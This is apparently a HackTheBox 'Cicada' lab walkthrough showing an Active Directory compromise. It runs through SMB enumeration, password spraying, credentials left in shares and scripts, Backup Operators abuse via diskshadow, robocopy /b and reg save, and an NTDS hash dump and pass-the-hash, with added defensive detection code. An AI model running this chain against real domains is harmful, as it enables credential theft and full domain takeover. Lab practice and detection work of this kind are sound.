HTB - Cicada

Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo nmap -sS -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo nmap -sU -p- --min-rate 10000 $ip -oN Nmap/udp
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: cicada.htb0)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Active Directory LDAP (Domain: cicada.htb0)
3268/tcp open ldap Active Directory LDAP (Domain: cicada.htb0)
3269/tcp open ssl/ldap Active Directory LDAP (Domain: cicada.htb0)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS - RPC - SMB - winRM - ldap
* Important notes: Domain: cicada.htb - commonName=CICADA-DC.cicada.htb
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo sh -c "echo '$ip CICADA-DC cicada.htb CICADA-DC.cicada.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ tail -n 1 /etc/hosts
10.10.11.35 CICADA-DC cicada.htb CICADA-DC.cicada.htb
DNS Enumeration
Zone transfer failed
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ dig axfr cicada.htb @$ip
; <<>> DiG 9.20.1-1-Debian <<>> axfr cicada.htb @10.10.11.35
;; global options: +cmd
; Transfer failed.
RPC Enumeration
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u '' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
I then used the spider_plus module from nxc to crawl the shares and list all the files inside. I found Notice from HR.txt, which could be interesting.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' -M spider_plus
{
"HR": {
"Notice from HR.txt": {
"atime_epoch": "2024-08-28 13:31:48",
"ctime_epoch": "2024-03-14 08:29:03",
"mtime_epoch": "2024-08-28 13:31:48",
"size": "1.24 KB"
}
}
}
Using smbclient from impacket, I connected to the share and downloaded all the files inside with the mget * command.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-smbclient cicada.htb/guest:''@$ip
# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use HR
# mget *
[*] Downloading Notice from HR.txt
# exit
Initial Access
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
After reading the file, I got a password that can be sprayed against domain users. Then I enumerated the domain users with the RID (Relative Identifier) brute-force technique.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' --rid-brute
..snip..
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
With the list of usernames, I could try the recovered password against each one.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat users.list
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u users.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
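From the defensive side, the spray above leaves a distinctive trace on the domain controller: a burst of failed logons (event 4625) for many different accounts from one source, with at most a handful of successes (4624) in the same window. The block below is an added example, not code from this page or from nxc, that implements that detection over a constructed, simplified log format (timestamp, event ID, account, source IP, status code). The source addresses 10.10.14.5 and 10.10.14.9 are made up; a real deployment would read the same fields from the Security log or a SIEM.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts event_id account src status")

# Constructed sample log (not real telemetry from the box). Each line is:
#   <ISO timestamp> <event id> <domain\account> <source ip> <NTSTATUS>
# The first five lines mirror the spray on this page; the last two are a
# single user mistyping their own password and must not alert.
SAMPLE_LOG = """\
2024-09-01T10:00:01 4625 cicada.htb\\john.smoulder 10.10.14.5 0xC000006D
2024-09-01T10:00:01 4625 cicada.htb\\sarah.dantelia 10.10.14.5 0xC000006D
2024-09-01T10:00:02 4624 cicada.htb\\michael.wrightson 10.10.14.5 0x0
2024-09-01T10:00:02 4625 cicada.htb\\david.orelious 10.10.14.5 0xC000006D
2024-09-01T10:00:03 4625 cicada.htb\\emily.oscars 10.10.14.5 0xC000006D
2024-09-01T10:30:00 4625 cicada.htb\\john.smoulder 10.10.14.9 0xC000006D
2024-09-01T10:31:00 4625 cicada.htb\\john.smoulder 10.10.14.9 0xC000006D
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d{4})\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_events(text):
    """Parse the sample format into Event tuples, oldest first."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # skip blank or malformed lines instead of failing the run
        ts, event_id, account, src, status = match.groups()
        events.append(Event(datetime.fromisoformat(ts), int(event_id),
                            account.lower(), src, status))
    return sorted(events, key=lambda e: e.ts)


def detect_spray(events, min_accounts=3, window=timedelta(minutes=5)):
    """Flag each source IP that fails logons for >= min_accounts distinct
    accounts inside one sliding window. Successes from the same source in
    that window are reported too: those are the accounts the spray hit."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev.src].append(ev)

    alerts = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e.event_id == 4625]
        for i, start in enumerate(failures):
            end = start.ts + window
            accounts = {e.account for e in failures[i:] if e.ts <= end}
            if len(accounts) >= min_accounts:
                hits = sorted({e.account for e in evs
                               if e.event_id == 4624 and start.ts <= e.ts <= end})
                alerts[src] = {"failed_accounts": sorted(accounts), "successes": hits}
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, detail in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(f"[spray] {src}: {len(detail['failed_accounts'])} accounts failed, "
              f"successes: {detail['successes'] or 'none'}")
```

The threshold and window are the tuning knobs: a low-and-slow spray needs a longer window, and environments with shared kiosks or NAT need a higher account count to avoid noise. Correlating the successful logon against the failures is what turns a "someone is spraying" alert into "and this account is now compromised".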
The password only worked for michael.wrightson. My next move was to fire up bloodhound-python and ldapdomaindump for a quick mapping of users and groups.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $bloodhound-python -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.10.11.35 -d cicada.htb
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Found 9 users
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 25S
┌──(kali㉿kali)-[~/…/platform/machines/Cicada/ldapdomaindump]
└─$ ldapdomaindump ldap://$ip -u 'cicada\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Lateral Movement
Domain Users info

From the users' info page, I got the following:
emily.oscars => member of Remote Management Users and Backup Operators
david.orelious => password: 'aRt$Lp#7t*VQ!3'
With david's password, I checked share access again; the account has READ access on most of the shares.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
Using spider_plus again, I found Backup_script.ps1
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus
..snip..
{
"DEV": {
"Backup_script.ps1": {
"atime_epoch": "2024-08-28 13:28:22",
"ctime_epoch": "2024-03-14 08:31:38",
"mtime_epoch": "2024-08-28 13:28:22",
"size": "601 B"
}
}
}
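The spider_plus listings on this page (the HR share crawled as guest earlier, and the DEV share above) are plain JSON, so they can be post-processed rather than read by eye. The block below is an added example, not code from this page or from nxc: it flattens the nested share/path/metadata tree into records, converts the human-readable size into bytes, and summarises how much each share exposes to the session that crawled it, which is the number that matters when auditing what a guest logon can read. The sample JSON is constructed to mirror the two listings on this page.

```python
import json
import re

# Constructed sample mirroring the shape of the nxc spider_plus output on this
# page (share -> file path -> metadata); timestamps and sizes are the page's values.
SAMPLE_SPIDER_PLUS = json.loads("""
{
  "HR": {
    "Notice from HR.txt": {
      "atime_epoch": "2024-08-28 13:31:48",
      "ctime_epoch": "2024-03-14 08:29:03",
      "mtime_epoch": "2024-08-28 13:31:48",
      "size": "1.24 KB"
    }
  },
  "DEV": {
    "Backup_script.ps1": {
      "atime_epoch": "2024-08-28 13:28:22",
      "ctime_epoch": "2024-03-14 08:31:38",
      "mtime_epoch": "2024-08-28 13:28:22",
      "size": "601 B"
    }
  }
}
""")

SIZE_RE = re.compile(r"^\s*([\d.]+)\s*([KMGT]?B)\s*$", re.I)
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3, "TB": 1024 ** 4}


def parse_size(text):
    """Convert the human-readable size ('1.24 KB') into an integer byte count."""
    match = SIZE_RE.match(text)
    if not match:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(round(float(match.group(1)) * UNITS[match.group(2).upper()]))


def flatten(tree):
    """Walk the share -> path -> metadata tree and return one record per file.

    A node is treated as a file when it carries 'size' and 'mtime_epoch';
    anything else is a directory level whose keys are path components.
    """
    records = []

    def walk(share, node, path):
        if "size" in node and "mtime_epoch" in node:
            records.append({
                "share": share,
                "path": path,
                "bytes": parse_size(node["size"]),
                "mtime": node["mtime_epoch"],
            })
            return
        for name, child in node.items():
            walk(share, child, f"{path}/{name}" if path else name)

    for share, entries in tree.items():
        walk(share, entries, "")
    return records


def summarise(records):
    """Per-share file count and total bytes readable by the crawling session."""
    summary = {}
    for rec in records:
        entry = summary.setdefault(rec["share"], {"files": 0, "bytes": 0})
        entry["files"] += 1
        entry["bytes"] += rec["bytes"]
    return summary


if __name__ == "__main__":
    for rec in flatten(SAMPLE_SPIDER_PLUS):
        print(f"{rec['share']:<8} {rec['bytes']:>8} B  {rec['mtime']}  {rec['path']}")
    print(summarise(flatten(SAMPLE_SPIDER_PLUS)))
```

Run the same flattening against a crawl made with a guest or null session and the summary is effectively a report of what the domain leaks to anyone on the network; on this box that is the HR notice with the default password in it.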
Download the file to examine it
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-smbclient cicada.htb/'david.orelious':'aRt$Lp#7t*VQ!3'@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# use DEV
# mget *
[*] Downloading Backup_script.ps1
The file below is a backup script that backs up SMB files using emily's credentials
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#Mxxxxxxxx" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
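The script above is the classic finding: a service account's password committed in clear text to a share that another account can read. Audit tooling can catch this pattern before an attacker does. The block below is an added example, not code from this page or from any project named on it: it scans PowerShell source for a few hard-coded credential patterns (ConvertTo-SecureString with -AsPlainText, quoted assignments to password-like or key-like variables) and reports line numbers with the value redacted, so the report itself does not leak the secret. The sample script and the secret in it are constructed.

```python
import re

# Constructed sample, not the script from the box. The last line shows the
# pattern that should be used instead (pulling the secret from a vault at
# run time) and must not be flagged.
SAMPLE_SCRIPT = '''\
$sourceDirectory = "C:\\smb"
$username = "svc_backup"
$password = ConvertTo-SecureString "Example-Secret-123" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$apiKey = "abcd1234efgh"
$vaultCred = Get-Secret -Name BackupSvc
'''

# (label, regex); group 1 captures the secret so it can be redacted.
PATTERNS = [
    ("plaintext SecureString",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    ("password assigned as literal",
     re.compile(r'\$(?:password|passwd|pwd)\s*=\s*"([^"]+)"', re.I)),
    ("key/token/secret assigned as literal",
     re.compile(r'\$\w*(?:key|token|secret)\w*\s*=\s*"([^"]+)"', re.I)),
]


def redact(secret):
    """Keep the first two characters so a finding can be matched to its source."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def scan_script(text):
    """Return one finding per line that matches a credential pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append({"line": lineno, "kind": label,
                                 "value": redact(match.group(1))})
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for finding in scan_script(SAMPLE_SCRIPT):
        print(f"line {finding['line']}: {finding['kind']} -> {finding['value']}")
```

The patterns are deliberately narrow; in practice they would sit alongside an entropy check and a scan of the share's other file types (batch files, .config, .ini), but the point is that a script like Backup_script.ps1 is detectable with a read-only crawl of the same share the attacker used.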
As we saw previously, emily is a member of Remote Management Users, so she can access the box using WinRM
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ evil-winrm -i $ip -u emily.oscars -p 'Q!3@Lp#Mxxxxxxxx'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt
1933e43bb4bcd65536axxxxxxxxxxxxxxxxx
User Flag: 1933e43bb4bcd65536axxxxxxxxxxxxxxxxx
Privilege Escalation
Emily is a member of the privileged group Backup Operators, so she can back up files from the DC. In our case, the most interesting files are the NTDS database and the SYSTEM and SAM registry hives:
NTDS: the domain controller's database, containing the credentials of all domain objects
SYSTEM: the registry hive that contains the key needed to decrypt them
SAM: the database of local system accounts

The principle of this attack is simple: we abuse backup privileges to create a shadow copy of a specific file (NTDS.DIT in our case) and extract the domain secrets from it
I created a .vss file containing instructions for the diskshadow utility to back up NTDS
more C:\Users\Public\diskshadowscript.txt
set context persistent nowriters
set metadata c:\windows\temp\file.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% p:
end backup
Then execute the tool with the following command
diskshadow.exe /s C:\programdata\shadow.vss
If you face an error when running diskshadow, try running the unix2dos command to convert the file to Windows line endings
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $unix2dos shadow.vss
unix2dos: converting file shadow.vss to DOS format...
Copy ntds.dit to the working directory and download it using evil-winrm
robocopy /b P:\Windows\ntds\ C:\programdata ntds.dit
Back up the SYSTEM registry hive
*Evil-WinRM* PS C:\programdata> reg save HKLM\SYSTEM system.save
The operation completed successfully.
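Every step above (diskshadow driven by a script file, robocopy in backup mode against the NTDS folder, reg save of the SYSTEM hive) runs as an ordinary process and therefore shows up in process-creation telemetry (Security event 4688 with command-line auditing, or Sysmon event 1). The block below is an added example, not code from this page or from any tool named on it, that expresses those three behaviours as command-line rules, notes when the parent process is wsmprovhost.exe (the WinRM host process, which is how emily's shell arrived), and raises the priority when one user trips more than one rule. The records are constructed, with a benign scheduled robocopy job included to show that it is not flagged.

```python
import re

# Constructed process-creation records (not real telemetry). The first three
# mirror the commands on this page; the fourth is a normal backup job.
SAMPLE_PROCS = [
    {"user": "CICADA\\emily.oscars",
     "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "cmdline": r"diskshadow.exe /s C:\programdata\shadow.vss"},
    {"user": "CICADA\\emily.oscars",
     "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "cmdline": r"robocopy /b P:\Windows\ntds\ C:\programdata ntds.dit"},
    {"user": "CICADA\\emily.oscars",
     "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "cmdline": r"reg save HKLM\SYSTEM system.save"},
    {"user": "CICADA\\svc_backup",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"robocopy C:\smb D:\Backup /E /R:1"},
]

# Each rule matches one of the behaviours in the chain; all are case-insensitive.
RULES = [
    ("diskshadow driven by script file",
     re.compile(r"\bdiskshadow(?:\.exe)?\b.*\s/s\b", re.I)),
    ("backup-mode copy touching ntds",
     re.compile(r"\brobocopy(?:\.exe)?\b.*\s/b\b.*ntds", re.I)),
    ("SYSTEM or SAM hive exported",
     re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SYSTEM|SAM)\b", re.I)),
]


def evaluate(procs):
    """Return one alert per (process, rule) match."""
    alerts = []
    for proc in procs:
        for name, pattern in RULES:
            if pattern.search(proc["cmdline"]):
                alerts.append({
                    "rule": name,
                    "user": proc["user"],
                    "via_winrm": proc["parent"].lower().endswith("wsmprovhost.exe"),
                })
    return alerts


def prioritise(alerts):
    """One rule hit is worth a look; two or more distinct rules from the same
    user in one batch is the full backup-operator chain and rates high."""
    rules_by_user = {}
    for alert in alerts:
        rules_by_user.setdefault(alert["user"], set()).add(alert["rule"])
    return {user: ("high" if len(rules) >= 2 else "medium")
            for user, rules in rules_by_user.items()}


if __name__ == "__main__":
    found = evaluate(SAMPLE_PROCS)
    for alert in found:
        suffix = " (via WinRM)" if alert["via_winrm"] else ""
        print(f"{alert['user']}: {alert['rule']}{suffix}")
    print(prioritise(found))
```

The mitigation is upstream of detection: Backup Operators membership on a domain controller is equivalent to domain admin, so the group should be empty or limited to accounts whose passwords are not sitting in a script on a readable share.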
After downloading the two files, I used secretsdump.py to extract the administrator's hash
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-secretsdump -system system.save -ntds ntds.dit LOCAL | grep -i administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0eaxxxxxxxxxxxxxx:::
Access the DC and get the root flag
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0eaxxxxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b53cd8bd68d39d7eb1xxxxxxxxxxxxxx
Root flag: b53cd8bd68d39d7eb1xxxxxxxxxxxxxx
Shortcut
I can read the root flag directly with backup privileges using robocopy :)
*Evil-WinRM* PS C:\programdata> robocopy /b C:\Users\Administrator\Desktop\ C:\programdata root.txt
*Evil-WinRM* PS C:\programdata> cat root.txt
b53cd8bd68d39d7eb1c4xxxxxxxxxxxxxxx